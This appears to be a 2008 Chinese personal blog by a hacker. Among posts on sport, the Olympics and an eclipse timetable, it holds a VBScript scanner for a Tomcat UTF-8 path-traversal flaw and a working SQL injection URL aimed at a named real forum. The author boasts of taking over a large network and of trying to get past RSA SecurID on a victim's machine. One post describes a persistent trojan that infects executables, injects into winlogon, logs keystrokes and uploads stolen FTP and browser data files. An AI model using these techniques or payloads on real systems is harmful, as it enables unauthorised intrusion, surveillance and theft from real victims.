凋凌玫瑰's blog

刘翔退赛了

tandailin@163.com(凋凌玫瑰) — Mon,18 Aug 2008 13:17:38 +0800

在QQ消息上看到了刘翔退赛的消息,又在电视上看到了冬日娜一翻声色泪下的称赞刘翔,心里不由得恨恨地骂了一句:"tmd,一个充满慌言,虚伪的世界!",电视中还放起哀乐了,听得浑身上下都起疙瘩.当从上到下,官方,媒体,社会文化,都充满慌言和虚假的时候,真难想像这种沿续将是一个什么样的社会.

aspx 操作mysql

tandailin@163.com(凋凌玫瑰) — Thu,14 Aug 2008 19:09:42 +0800

今天遇到一个iis只支持aspx的,禁用了asp,服务器装了mysql odbc驱动,想在那个iis上操作另一个服务器的mysql,可没现成的aspx操作mysql的程序,找了一下午,在msdn上找到个.net的sqldatasource类可以操作.
测试成功了,留在这里备忘一下.

程序代码

<%@ Page Language="VB" %>
"http://www.w3.org/TR/xhtmlll/DTD/xhtmlll.dtd">

http://www.w3.org/1999/xhtml" >

asp.net to mysql

asp.net connect mysql

DataSourceID="SqlDataSourcel">

ProviderName="System.Data.Odbc"
ConnectionString= "DRIVER={MySQL ODBC 3.51 Driver};SERVER=localhost;DATABASE=test;UID=test;PASSWORD=testtest;"
SelectCommand="Select * from dede_admin"
>

Apache Tomcat UTF-8编码漏洞

tandailin@163.com(凋凌玫瑰) — Wed,13 Aug 2008 11:59:32 +0800

这个漏洞类似当年的iis url 编码漏洞
漏洞发生在Apache Tomcat处理UTF-8编码时，没有正确转换，从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式，使得可以遍历系统任意文件，包括

/etc/passwd等

触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项

漏洞测试代码如下：

程序代码

Dim strUrl,strSite

showB()
Set Args = Wscript.Arguments

If Args.Count <> 1 Then
ShowU()
Else
strSite=Args(0)
End If

strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"

Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET",strSite & strUrl, False
objXML.SetRequestHeader "Referer", strSite

objXML.send()

if objXML.status=200 then
wscript.echo("存在漏洞")

end if

Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit Apache Tomcat UTF-8")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub

奥运开幕式

tandailin@163.com(凋凌玫瑰) — Sat,09 Aug 2008 09:58:07 +0800

只看到了中国的历史。。。。。

DISCUZ字符转码漏洞

tandailin@163.com(凋凌玫瑰) — Thu,07 Aug 2008 20:11:43 +0800

最近出来的php第三方编码转换类漏洞又要死一大批php站了。
先是phpwind接着又是discuz论坛
编码转换没处理的都会存在这类漏洞了
phpwind的大家都知道了，今天群里还有人不知道discuz的。
顺便在群里看到个discuz论坛的站，发出来就都知道咋注了。
http://bbs.hefei.cc/space.php?username=%cf'%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*
我个人还是比较反对四处黑站的。

纪念一下

tandailin@163.com(凋凌玫瑰) — Thu,07 Aug 2008 15:37:16 +0800

今天取得了目前遇到的最大网络的最高权限，在此过程中又提升了一些经验，当取得了超越管理员的权限时，也就超越了自己，有一种说不出的高兴。

遭遇RSA securid动态加密

tandailin@163.com(凋凌玫瑰) — Wed,06 Aug 2008 15:44:55 +0800

终于遇到传说中的RSA securid动态加密了，加密的3389，在登录的时候是随机产生密码的，汗。。。。
对方将所有的管理员登录敏感数据的操作都放在只对rsa加密的终端服务器跳板之后。
控制了管理员机器，但管理员的操作都是3389登录到rsa加密的跳板机上的，动态密码每一分钟变一次，记录也没用，很强的，思索中。。。。。
在网上找了一个这个第三方加密软件的资料，很强。
securID动态令牌可以用于任何一种支持动态口令认证的系统。不光是登录VPN的时候用。
需要一台认证服务器，可以装cisco的ACS server搭建radius认证服务器，然后安装RSA securid的管理客户端，也就是插件到这台ACS服务器上，然后把需要才用动态口令认证的用户或用户组选择认证方式为RSA securid，其他的ACS服务器设置没啥特别的，认证服务器这头的设计就基本完成了。
然后需要另外一台服务器安装RSA securid的管理软件，这台服务器需要和ACS server有良好的通讯，需要设置安全认证互访。这台RSA管理服务器的作用主要是对一块块小的电子令牌做初始化同步的时候使用的。
令牌和认证服务器和管理服务器完全没有物理联系，令牌中的数字每分钟的变化其实是个伪随机算法，根据每个令牌背后的序列号作为运算的一个参数进行每分钟的跳动的。初始化的时候，需要拿着令牌设置管理服务器上的管理软件，需要输入令牌的序列号，然后输入令牌上显示的6位数字，过一分钟再输入一次，这样服务器就完成了和令牌的“时间”同步。也就是服务器知道了这个号码的令牌每一分钟变化的规律了。加上4位PIN是为了降低令牌本身被偷盗后造成的风险。

至于认证的时候，用户登录启用动态认证的系统，会要求输入个人的4位PIN码加上令牌当前显示的6位数字。然后应用系统会根据系统的设置才用LDAP或者RADIUS等方式去询问ACS认证服务器进行授权，那ACS服务器看到这个请求，自然根据ACS中的设置再去询问RSA管理服务器是否正确，全都OK就认证通过。

由于时间不可能完全对准，所以，基本上认证的时候前后差1分钟显示的3个数字都会被接受。

我国部分城市明日将现日全食(时间表)

tandailin@163.com(凋凌玫瑰) — Thu,31 Jul 2008 17:11:35 +0800

新华网南京7月31日电（记者蔡玉高、周润健）为方便公众观赏此次日食，中科院紫金山天文台副研究员曹云经过测算，得出了我国主要城市可见日食的时间。

8月1日，我国将迎来本世纪第一次日全食

曹云介绍，日全食的发生主要包括这样几个时间节点：初亏，月球靠近太阳之时，月球的视圆面第一次和太阳视圆面相外切的时刻，即日食开始；食甚，月球中心和太阳中心距离最近的时刻，此时，看到太阳被遮掩的部分最大。日全食时，食甚即为太阳被完全遮住之时；复圆，月球的视圆面第二次和太阳视圆面相外切的时刻，即该地方见食结束。

以下是我国主要城市可见日食的时间表，其中时间为北京时间，“——”则代表该城市无法见到日全食发生的那个特定的时间点。曹云表示，无法看到食甚的公众将能看到带食日落的美妙场景，而能够看到食甚的公众则相对较为幸运，他们可看到太阳被月亮完全遮住时的情景。当然，最幸运的要数能够看到复圆的公众，因为他们能够看到整个日全食的发生过程。

地名初亏食甚复圆

北京 18时17分13秒 19时10分02秒————

天津 18时18分18秒 19时10分48秒————

石家庄 18时20分21秒 19时13分27秒————

太原 18时20分49秒 19时14分26秒————

呼和浩特18时16分15秒 19时10分26秒————

沈阳 18时13分12秒 19时04分24秒————

长春 18时09分42秒 19时00分36秒————

哈尔滨18时06分40秒 18时57分25秒————

上海 18时28分27秒 ————————

南京 18时28分12秒 ————————

杭州 18时30分11秒 ————————

合肥 18时28分54秒————————

福州 18时36分17秒 ————————

南昌 18时33分48秒 ————————

济南 18时22分02秒 19时14分19秒————

郑州 18时25分27秒 19时18分21秒————

武汉 18时31分30秒 ————————

长沙 18时35分19秒 ————————

广州 18时42分36秒 ————————

南宁 18时44分39秒 ————————

成都 18时32分57秒 19时27分34秒————

贵阳 18时39分10秒 19时32分01秒————

昆明 18时42分18秒 19时35分32秒————

拉萨 18时34分09秒 19时31分42秒 20时24分44秒

西安 18时26分46秒 19时20分50秒————

兰州 18时24分01秒 19时19分49秒————

西宁 18时22分53秒 19时19分24秒 20时12分00秒

银川 18时20分03秒 19时15分31秒————

乌鲁木齐18时05分34秒 19时07分34秒 20时04分59秒

台北 18时36分39秒 ————————

香港 18时43分30秒 ————————

海口 18时48分14秒 ————————

澳门 18时43分51秒 ————————

重庆 18时34分26秒 19时28分11秒————

漠河 17时55分10秒 18时47分33秒 19时37分33秒

喀什 18时08分12秒 19时12分31秒 20时11分31秒

抚远 18时01分02秒

PJblog 密码修改

tandailin@163.com(凋凌玫瑰) — Thu,31 Jul 2008 17:01:58 +0800

今天又忘了blog 的密码了，想去数据库修改，看它加密方式又不是md5,只好写段asp来修改了，放在这儿下次忘了密码备用。

程序代码

<%
dim rs,my_Name
my_Name="need find user"
set conn=Server.CreateObject("ADODB.Connection")　
DBPath = Server.MapPath("xxxx.mdb")
conn.Open "provider=microsoft.jet.oledb.4.0;data source="&dbpath
Set rs = Server.CreateObject("ADODB.Recordset")　
rs.open "select mem_ID,mem_Name,mem_Password,mem_salt from blog_Member where mem_email='my_name'",conn,1,3
  dim NewPass,Uname,NewPass2
  Uname=rs("mem_Name")
  randomize
  NewPass=Int(8999*Rnd() +1000)
    if len(NewPass)>0 then
      dim strSalt
      strSalt=rs("mem_salt")
      NewPass2=SHA1(NewPass&strSalt)
      Conn.Execute("update blog_member set mem_Password='"&NewPass2&"',mem_salt='"&strSalt&"' where mem_name='"&my_name&"')
      end if
  rs.close
  set rs=nothing
  response.write " alert('user "&Uname&" change password:"&NewPass&"\n\n');location.replace
('default.asp');"
  response.End()
%>

如何留住重要机器

tandailin@163.com(凋凌玫瑰) — Tue,15 Jul 2008 13:34:37 +0800

前段时间历尽千辛万苦让管理员机器中了木马，可见这台机器是来得相当不易。
为了控制好这台机器，我想出了一个死缠烂打的程序。
首先是一个感染，当然这个感染功能是写在下载者里面的，其实感染程序和下载者是两个程序，分开来写的，然后又融合在了一起。
感染采用搜寻除c盘的其它盘的exe文件，在其pe有小于四百字节的，在空字节里面写入download shellcode,download shellcode采用加密变型，主要用来下载一个下载者，下载者生成一个文件供这个感染程序来判断是否下载并执行成功，如果下载执行成功，就不再执行下载。此感染程序不改变文件大小和时间及文件图标。整个程序汇编三百多字节完成。
感染程序感染的pe文件都注入一个感染的下载shellcode，先判断标识文件，没下载者生成的文件就再下载下载者。用来守护下载者。
下载者是另一部分，采用汇编体积很少，下载者恢复ssdt过主动，插入winlogon进程，并hook自身dll文件。下载者从url中读取一个下载列表，每次开机判断url中txt文件的下载exe名是否有变化，有变化就重新下载。
再将一个记录发送工具集成在了下载者列表中，搜索本机sm.dat stats.dat sites.dat quick.dat bookmarks.dat文件，并上传到空间。同时集成了键盘记录，并按生成的日志大小发送到空间。
哈哈，大杀器让工作室刘大侠几天时间完成了。
现管理员已重装了n次机器，依然上线如健，最近一次手工清了我的马，还待他重启一下机器就下载个新马进去了，哈哈。